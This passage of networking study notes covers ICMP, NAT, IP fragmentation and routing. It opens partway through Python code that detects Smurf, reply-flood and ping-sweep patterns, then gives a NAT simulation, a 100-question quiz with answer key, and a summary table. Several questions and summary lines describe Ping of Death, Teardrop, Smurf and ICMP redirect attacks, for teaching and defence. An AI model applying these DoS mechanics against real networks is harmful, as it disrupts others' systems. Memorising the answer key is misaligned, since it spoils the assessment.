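    """packets: iterable of (src_ip, dst_ip, icmp_type). Returns findings by name."""
    net = ipaddress.ip_network(local_net)
    broadcast = str(net.broadcast_address)
    findings = defaultdict(set)
    replies_to = Counter()            # reply storm towards one address
    requests_from = defaultdict(set)  # distinct hosts each source probes
    for src, dst, icmp_type in packets:
        if icmp_type == ECHO_REQUEST:
            requests_from[src].add(dst)
            if dst == broadcast:
                # Smurf trigger: the request's source is the intended victim,
                # because every host that answers will answer that address.
                findings["smurf-request"].add(src)
        elif icmp_type == ECHO_REPLY:
            replies_to[dst] += 1
    for dst, count in replies_to.items():
        if count >= reply_threshold:
            findings["reply-flood"].add(dst)   # the victim side of Smurf/flooding
    for src, targets in requests_from.items():
        if len(targets) >= sweep_threshold:
            findings["ping-sweep"].add(src)    # reconnaissance: one src, many dsts
    return {name: sorted(addrs) for name, addrs in findings.items()}


def constructed_capture():
    """A small synthetic capture: normal pings, a Smurf run and a ping sweep."""
    pkts = [("10.9.0.5", "10.9.0.6", ECHO_REQUEST), ("10.9.0.6", "10.9.0.5", ECHO_REPLY)]
    pkts.append(("203.0.113.9", "10.9.0.255", ECHO_REQUEST))          # spoofed src
    pkts += [(f"10.9.0.{i}", "203.0.113.9", ECHO_REPLY) for i in range(1, 61)]
    pkts += [("10.9.0.77", f"10.9.0.{i}", ECHO_REQUEST) for i in range(100, 120)]
    return pkts


if __name__ == "__main__":
    for name, addrs in analyse_icmp(constructed_capture(), "10.9.0.0/24").items():
        print(f"{name}: {addrs}")
```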
PART 9: NAT (NETWORK ADDRESS TRANSLATION)
1. CONCEPT
Purpose: - All devices in the local network share ONE IPv4 address (as far as the outside world is concerned)
How it works:
Local network: private addresses in 10.0.0.0/24 (e.g., 10.0.0.1)
What the outside world sees: a single public address, 138.76.29.7
2. NAT TRANSLATION
Outgoing: 1. Host 10.0.0.1:3345 → 128.119.40.186:80 2. The NAT router changes: - Source: 10.0.0.1:3345 → 138.76.29.7:5001 - Destination: 128.119.40.186:80 (unchanged) 3. Updates the NAT translation table: WAN side 138.76.29.7:5001 ↔ LAN side 10.0.0.1:3345
Incoming: 1. Reply: 128.119.40.186:80 → 138.76.29.7:5001 2. The NAT router looks up the table: - 138.76.29.7:5001 → 10.0.0.1:3345 3. Changes the destination: - 128.119.40.186:80 → 10.0.0.1:3345 4. Delivers to the internal host
Characteristics: - Datagrams leaving the local network: same source NAT IP, different source ports - Datagrams inside the network: 10.0.0/24 addresses (as usual)
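The translation walk-through above as code, as an added example that is not code from the original notes: outbound packets get a fresh public port and a table entry, replies are mapped back through that entry, and inbound packets with no entry are dropped. Nat is an assumed name; the addresses and ports are the notes' own.

```python
# Added example (not from the original notes): a port-translating NAT with
# the lookup behaviour described above. Nat is an assumed name.
class Nat:
    """Many private addresses behind one public IPv4 address."""

    def __init__(self, public_ip, first_port=5001):
        self.public_ip = public_ip
        self.next_port = first_port
        self.lan_to_wan = {}    # (lan_ip, lan_port) -> wan_port
        self.wan_to_lan = {}    # wan_port -> (lan_ip, lan_port)

    def outbound(self, src_ip, src_port, dst_ip, dst_port):
        """Rewrite a LAN->WAN packet; returns the translated 4-tuple."""
        key = (src_ip, src_port)
        if key not in self.lan_to_wan:
            if self.next_port > 65535:
                raise RuntimeError("NAT port pool exhausted")
            self.lan_to_wan[key] = self.next_port
            self.wan_to_lan[self.next_port] = key
            self.next_port += 1
        return (self.public_ip, self.lan_to_wan[key], dst_ip, dst_port)

    def inbound(self, src_ip, src_port, dst_ip, dst_port):
        """Rewrite a WAN->LAN packet, or return None when no mapping exists:
        unsolicited packets from outside have nowhere to go and are dropped."""
        if dst_ip != self.public_ip or dst_port not in self.wan_to_lan:
            return None
        lan_ip, lan_port = self.wan_to_lan[dst_port]
        return (src_ip, src_port, lan_ip, lan_port)

    def table(self):
        """Rows of the translation table: (WAN side, LAN side)."""
        return sorted((f"{self.public_ip}:{p}", f"{ip}:{port}")
                      for p, (ip, port) in self.wan_to_lan.items())


if __name__ == "__main__":
    nat = Nat("138.76.29.7")
    print(nat.outbound("10.0.0.1", 3345, "128.119.40.186", 80))
    print(nat.table())
    print(nat.inbound("128.119.40.186", 80, "138.76.29.7", 5001))
    print(nat.inbound("198.51.100.4", 4444, "138.76.29.7", 6000))
```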
QUESTION BANK, CHAPTER 8
PART 1: NETWORK LAYER BASICS
Question 1: What does the network layer transport?
A. Frames
B. Segments from the sending to the receiving host ✓
C. Bits
D. Messages
Question 2: What does the sender encapsulate into datagrams?
A. Frames
B. Segments ✓
C. Packets
D. Messages
Question 3: Where are network layer protocols found?
A. Only in routers
B. Only in hosts
C. Every Internet device: hosts, routers ✓
D. Only in switches
Question 4: What do routers examine in datagrams?
A. Only the destination IP
B. Header fields ✓
C. Only the payload
D. Only the checksum
Question 5: What is forwarding?
A. Planning a trip
B. Move packets from input link to output link (local, per-router) ✓
C. Global routing
D. Error correction
Question 6: What is routing?
A. Local forwarding
B. Determine the route from source to destination (network-wide logic) ✓
C. Error checking
D. Compression
Question 7: Forwarding is analogous to what?
A. Planning the entire trip
B. Getting through a single interchange ✓
C. Choosing a destination
D. Buying a ticket
Question 8: Routing is analogous to what?
A. Driving through one intersection
B. Planning a trip from source to destination ✓
C. Stopping at one place
D. Refueling
Question 9: What is the data plane?
A. Global logic
B. Local, per-router function - forwarding ✓
C. Remote control
D. Application layer
Question 10: What is the control plane?
A. Local forwarding
B. Network-wide logic - routing ✓
C. Data transmission
D. Error handling
Question 11: What are the two approaches to the control plane?
A. Fast and Slow
B. Traditional routing algorithms AND SDN ✓
C. Manual and Automatic
D. Wired and Wireless
Question 12: Where are traditional routing algorithms implemented?
A. Remote servers
B. IN routers ✓
C. Cloud
D. Hosts only
Question 13: Where is SDN (Software-Defined Networking) implemented?
A. In routers
B. Remote servers ✓
C. Switches
D. Hosts
Question 14: In SDN, who computes the forwarding tables?
A. Each router independently
B. Remote Controller ✓
C. Switches
D. Hosts
PART 2: IP DATAGRAM FORMAT
Question 15: Minimum IP header size?
A. 8 bytes
B. 20 bytes ✓
C. 32 bytes
D. 40 bytes
Question 16: IP Version field value for IPv4?
A. 1
B. 2
C. 4 ✓
D. 6
Question 17: Unit of the IHL (Header Length) field?
A. Bytes
B. 32-bit words ✓
C. Bits
D. KB
Question 18: What is IHL typically equal to?
A. 4
B. 5 (5 × 4 = 20 bytes) ✓
C. 10
D. 20
Question 19: How many bits does the Total Length field have?
A. 8
B. 16 ✓
C. 32
D. 64
Question 20: Maximum IP datagram size?
A. 1500 bytes
B. 65,535 bytes (64KB) ✓
C. 1 MB
D. Unlimited
Question 21: Typical IP datagram size?
A. 64 KB
B. 1500 bytes or less ✓
C. 100 bytes
D. 10 KB
Question 22: How many bits does the Flags field have?
A. 1
B. 2
C. 3 ✓
D. 8
Question 23: What does the MF flag mean?
A. Must Forward
B. More Fragments ✓
C. Maximum Forward
D. Minimum Fragments
Question 24: How many bits does the Fragment Offset field have?
A. 8
B. 13 ✓
C. 16
D. 32
Question 25: Unit of the Fragment Offset field?
A. Bytes
B. 8-byte blocks ✓
C. Bits
D. 32-bit words
Question 26: Why is the Fragment Offset ÷ 8?
A. Faster calculation
B. Saves bits: can address 65,528 bytes instead of 8,191 ✓
C. Easier to understand
D. Random choice
Question 27: What is TTL?
A. Total Transfer Length
B. Time To Live - remaining max hops ✓
C. Type To Link
D. Transport Layer Level
Question 28: What happens to the TTL at each router?
A. Increased by 1
B. Decremented (decreased by 1) ✓
C. Left unchanged
D. Reset to 255
Question 29: When TTL = 0, what does the router do?
A. Forward the packet
B. Drops the packet, sends ICMP Time Exceeded ✓
C. Increase the TTL
D. Broadcast the packet
Question 30: What does Protocol field = 6 mean?
A. UDP
B. TCP ✓
C. ICMP
D. IP
Question 31: What does Protocol field = 17 mean?
A. TCP
B. UDP ✓
C. ICMP
D. ARP
Question 32: What does Protocol field = 1 mean?
A. TCP
B. UDP
C. ICMP ✓
D. HTTP
Question 33: What does the Header Checksum cover?
A. Entire datagram
B. Header only (NOT the payload) ✓
C. Only the payload
D. Only the Source IP
Question 34: IP overhead with TCP?
A. 20 bytes
B. 40 bytes
C. 20 bytes IP + 20 bytes TCP = 40 bytes + app overhead ✓
D. 60 bytes
PART 3: TTL & TRACEROUTE
Question 35: Main purpose of TTL?
A. Security
B. Prevent infinite loops ✓
C. Encryption
D. Compression
Question 36: What does traceroute send to the destination?
A. ICMP
B. TCP
C. UDP segments ✓
D. ARP
Question 37: What TTL does the 1st set of traceroute probes have?
A. 0
B. 1 ✓
C. 64
D. 255
Question 38: What TTL does the 2nd set have?
A. 1
B. 2 ✓
C. 10
D. 20
Question 39: Which ICMP message type/code does the nth router send?
A. Type 0, Code 0
B. Type 11, Code 0 (Time Exceeded) ✓
C. Type 3, Code 3
D. Type 8, Code 0
Question 40: When does traceroute stop?
A. TTL = 255
B. The destination returns ICMP Type 3 Code 3 (Port Unreachable) ✓
C. No reply
D. After 10 hops
PART 4: IP FRAGMENTATION
Question 41: What is the MTU?
A. Minimum Transfer Unit
B. Max Transfer Size - largest possible link-level frame ✓
C. Multiple Transfer Unit
D. Media Type Unit
Question 42: Typical Ethernet MTU?
A. 576 bytes
B. 1500 bytes ✓
C. 4000 bytes
D. 64 KB
Question 43: Where is an IP datagram reassembled?
A. First router
B. Every router
C. ONLY at the destination ✓
D. Source
Question 44: Fragment 1 of a 4000-byte datagram (MTU=1500): Length?
A. 4000
B. 1500 ✓
C. 1480
D. 20
Question 45: Fragment 1, data size (excluding the header)?
A. 1500
B. 1480 (1500 - 20) ✓
C. 1460
D. 20
Question 46: Fragment 2 offset (after 1480 bytes of data)?
A. 1480
B. 185 (1480 ÷ 8) ✓
C. 200
D. 1500
Question 47: What flag does the last fragment have?
A. 1
B. 0 (No More Fragments) ✓
C. 2
D. 3
Question 48: What flag do the middle fragments have?
A. 0
B. 1 (More Fragments) ✓
C. 2
D. 3
PART 5: IP FRAGMENTATION ATTACKS
Question 49: What does Protocol Violation mean?
A. Following rules
B. Breaking protocol rules ✓
C. Encrypting data
D. Compressing packets
Question 50: What does the Ping of Death attack do?
A. Send normal pings
B. Create an IP packet LARGER than 65,536 bytes ✓
C. Delete packets
D. Encrypt packets
Question 51: What does a PoD attack cause?
A. Slow network
B. Buffer overflow ✓
C. Fast forwarding
D. Encryption error
Question 52: Last fragment with offset=8191, length=1000: real size?
A. 65,536
B. 66,500 bytes (> 65,536!) ✓
C. 64,000
D. 8,191
Question 53: What is CVE-2020-16898?
A. ARP vulnerability
B. Windows TCP/IP Stack PoD in ICMPv6 ✓
C. DNS bug
D. HTTP flaw
Question 54: What does the Teardrop attack create?
A. Normal fragments
B. Overlapping fragments ✓
C. Encrypted fragments
D. Compressed fragments
Question 55: Teardrop: Fragment 1 offset=0 length=820, Fragment 2 offset=600: overlap?
A. No overlap
B. Gap
C. Negative overlap (HUGE unsigned value) ✓
D. Perfect fit
Question 56: DoS with fragmentation: how many packets are sent?
A. Thousands
B. Millions
C. 2 tiny packets (~100 bytes each) ✓
D. One large packet
Question 57: How many resources does the fragmentation DoS tie up?
A. 100 bytes
B. 1 KB
C. 64 KB ✓
D. 1 MB
Question 58: Why is the fragmentation DoS efficient?
A. Fast
B. Small bandwidth → large resource consumption ✓
C. Encrypted
D. Compressed
PART 6: ROUTING
Question 59: Linux command to show the routing table?
A. ifconfig
B. netstat
C. ip route ✓
D. route -n
Question 60: Linux command to add a route?
A. route add
B. sudo ip route add ✓
C. ifconfig add
D. netstat add
Question 61: The main routing rule?
A. First match
B. Longest match ✓
C. Shortest match
D. Random
Question 62: 192.168.60.5 matches /0, /16, /24, /32. Which one is chosen?
A. /0
B. /16
C. /24
D. /32 (longest!) ✓
Question 63: How do routers configure their routing table?
A. Manually only
B. Routing protocols (OSPF, BGP) ✓
C. DHCP only
D. DNS only
Question 64: How do hosts configure their routing table?
A. Routing protocols only
B. DHCP, default routers, manual, ICMP redirect ✓
C. DHCP only
D. Manually only
Question 65: What does RPF stand for?
A. Rapid Packet Forwarding
B. Reverse Path Filtering / Reverse-Path Forwarding ✓
C. Random Protocol Function
D. Router Protection Feature
Question 66: What does RPF protect against?
A. Viruses
B. Packet spoofing ✓
C. DDoS only
D. Encryption
Question 67: How does RPF work?
A. Block all packets
B. Reverse lookup: return path on the same interface → Allow, else Drop ✓
C. Forward all
D. Encrypt packets
Question 68: Symmetric routing in RPF?
A. Drop the packet
B. Allow the packet (return path on the same interface) ✓
C. Encrypt the packet
D. Broadcast the packet
Question 69: Asymmetric routing in RPF?
A. Allow the packet
B. Drop the packet (return path on a different interface) ✓
C. Forward the packet
D. Modify the packet
PART 7: ICMP PROTOCOL
Question 70: What does ICMP stand for?
A. Internet Connection Management Protocol
B. Internet Control Message Protocol ✓
C. Internal Communication Message Protocol
D. IP Control Management Protocol
Question 71: Who uses ICMP?
A. Only hosts
B. Only routers
C. Hosts AND routers ✓
D. Only switches
Question 72: What does ICMP communicate?
A. Application data
B. Network-level information ✓
C. Only errors
D. Only routing
Question 73: What are ICMP messages carried in?
A. Ethernet frames only
B. IP datagrams ✓
C. TCP segments
D. UDP packets
Question 74: What is ICMP Type 0 Code 0?
A. Echo Request
B. Echo Reply (ping) ✓
C. Time Exceeded
D. Unreachable
Question 75: What is ICMP Type 8 Code 0?
A. Echo Reply
B. Echo Request (ping) ✓
C. Time Exceeded
D. Unreachable
Question 76: What is ICMP Type 11 Code 0?
A. Echo Reply
B. Unreachable
C. TTL Expired / Time Exceeded ✓
D. Redirect
Question 77: What is ICMP Type 3 Code 3?
A. Network Unreachable
B. Host Unreachable
C. Dest Port Unreachable ✓
D. Echo Reply
Question 78: What is ICMP Type 5 Code 0?
A. Echo Request
B. Time Exceeded
C. Redirect ✓
D. Unreachable
Question 79: Which ICMP types does ping use?
A. Type 11
B. Type 8 (Request) and Type 0 (Reply) ✓
C. Type 3
D. Type 5
Question 80: Which ICMP type does traceroute receive?
A. Type 0
B. Type 8
C. Type 11 (Time Exceeded) ✓
D. Type 5
PART 8: ICMP REDIRECT ATTACK
Question 81: Legitimate purpose of ICMP Redirect?
A. Attack only
B. Tell a host about a better route ✓
C. Encrypt traffic
D. Block traffic
Question 82: What does an ICMP Redirect contain?
A. Entire routing table
B. Better gateway IP address ✓
C. All routes
D. DNS info
Question 83: ICMP Redirect Type and Code?
A. Type 0, Code 0
B. Type 8, Code 0
C. Type 5, Code 0 ✓
D. Type 11, Code 0
Question 84: What does an attacker use ICMP Redirect for?
A. DoS
B. MITM attack ✓
C. Sniffing only
D. Encryption
Question 85: Can an ICMP Redirect be launched from a remote computer?
A. Yes
B. NO - the host checks that the gateway is on the same network ✓
C. Depends on the firewall
D. Only with a VPN
Question 86: Can an ICMP Redirect redirect to a remote computer?
A. Yes
B. NO - RPF drops it, the gateway must be on the same subnet ✓
C. Depends on the router
D. TCP only
Question 87: Where does ICMP Redirect work?
A. Globally
B. Locally (same LAN) ✓
C. Internet-wide
D. Cloud only
PART 9: SMURF ATTACK & ICMP DoS
Question 88: What does the Smurf attack use?
A. TCP SYN
B. ICMP Echo Request to the broadcast address ✓
C. UDP flood
D. ARP poisoning
Question 89: What does the Smurf attack spoof?
A. Destination IP
B. Source IP = Victim's IP ✓
C. MAC address
D. Port number
Question 90: Smurf attack destination?
A. Unicast
B. Broadcast address ✓
C. Multicast
D. Loopback
Question 91: In a Smurf attack, what do all hosts do?
A. Ignore
B. Forward
C. Reply to the victim with an Echo Reply ✓
D. Block
Question 92: What does the Smurf attack cause for the victim?
A. Speed up
B. Overwhelmed with Echo Replies - DoS ✓
C. Security improvement
D. Nothing
Question 93: Prevention for the Smurf attack?
A. Use TCP
B. Configure routers NOT to forward broadcast packets, disable ICMP to broadcast ✓
C. Use a VPN
D. Stronger passwords
Question 94: What is ICMP Flooding?
A. Normal pings
B. Send a massive amount of ICMP Echo Requests ✓
C. One ping
D. Encrypted ICMP
Question 95: How is ICMP used for reconnaissance?
A. Not possible
B. Ping sweep: discover live hosts; Traceroute: map topology ✓
C. Only encryption
D. Only authentication
PART 10: NAT
Question 96: What does NAT stand for?
A. Network Authentication Technology
B. Network Address Translation ✓
C. New Advanced Transmission
D. National Address Table
Question 97: What does NAT allow?
A. Faster Internet
B. All devices in the local network share ONE IPv4 address ✓
C. More security only
D. Encryption
Question 98: What do datagrams leaving the local network have in common?
A. Destination
B. Same source NAT IP, different source ports ✓
C. Protocol
D. TTL
Question 99: What does the NAT translation table contain?
A. Only IP addresses
B. Only ports
C. WAN side addr:port ↔ LAN side addr:port ✓
D. MAC addresses
Question 100: What does the NAT router do with an outgoing packet?
A. Only forward it
B. Changes source IP:port to NAT public IP:new port, updates the table ✓
C. Drops the packet
D. Encrypts the packet
QUICK ANSWER KEY
1.B 2.B 3.C 4.B 5.B 6.B 7.B 8.B 9.B 10.B 11.B 12.B 13.B 14.B 15.B 16.C 17.B 18.B 19.B 20.B 21.B 22.C 23.B 24.B 25.B 26.B 27.B 28.B 29.B 30.B 31.B 32.C 33.B 34.C 35.B 36.C 37.B 38.B 39.B 40.B 41.B 42.B 43.C 44.B 45.B 46.B 47.B 48.B 49.B 50.B 51.B 52.B 53.B 54.B 55.C 56.C 57.C 58.B 59.C 60.B 61.B 62.D 63.B 64.B 65.B 66.B 67.B 68.B 69.B 70.B 71.C 72.B 73.B 74.B 75.B 76.C 77.C 78.C 79.B 80.C 81.B 82.B 83.C 84.B 85.B 86.B 87.B 88.B 89.B 90.B 91.C 92.B 93.B 94.B 95.B 96.B 97.B 98.B 99.C 100.B
QUICK SUMMARY TABLE - CHAPTER 8
1. NETWORK LAYER
- Forwarding: local, move packets input→output
- Routing: global, determine paths, routing algorithms
- Data plane: local forwarding
- Control plane: network-wide routing (traditional: in routers; SDN: remote)
2. IP HEADER
- Min 20 bytes: Ver(4b), IHL(4b), ToS(8b), TotalLen(16b), ID(16b), Flags(3b), Offset(13b), TTL(8b), Proto(8b), Chksum(16b), SrcIP(32b), DstIP(32b)
- Max size: 65,535 bytes (16-bit Total Length)
- TTL: decremented at every hop; = 0 → drop + ICMP Type 11
- Offset: ÷ 8 (addresses 65,528 bytes)
3. FRAGMENTATION
- MTU: 1500 bytes (Ethernet)
- Reassembly: ONLY at the destination
- Offset = data_bytes ÷ 8
- Flags: 1 = More Fragments, 0 = Last
4. FRAGMENTATION ATTACKS
- Ping of Death: packet > 65,536 bytes → buffer overflow
- Teardrop: overlapping fragments → negative gap
- DoS: 2 packets (offset 0 & 65535) → tie up 64KB of resources
5. ROUTING
- Rule: longest match
- RPF: reverse lookup, symmetric = Allow, asymmetric = Drop
- Config: routers (OSPF, BGP), hosts (DHCP, default, manual, ICMP redirect)
6. ICMP TYPES
- 0: Echo Reply (ping)
- 3: Dest Unreachable (code 0=net, 1=host, 3=port)
- 5: Redirect (MITM!)
- 8: Echo Request (ping)
- 11: TTL Expired (traceroute)
7. ICMP ATTACKS
- Redirect: MITM, ONLY local (same LAN), RPF blocks remote
- Smurf: spoof src=victim, dst=broadcast → all reply to the victim
- Flooding: massive ICMP → DoS
8. NAT
- Purpose: all local devices share 1 public IP
- Table: WAN addr:port ↔ LAN addr:port
- Outgoing: change src to NAT IP:new port
EXAM PREP: Memorize the IP header fields, TTL and traceroute, fragmentation (offset ÷ 8, reassembly at the destination), the 3 fragmentation attacks, longest-match routing, RPF, the ICMP types (0, 3, 5, 8, 11), the limitations of the ICMP attacks (local only, RPF), and NAT translation!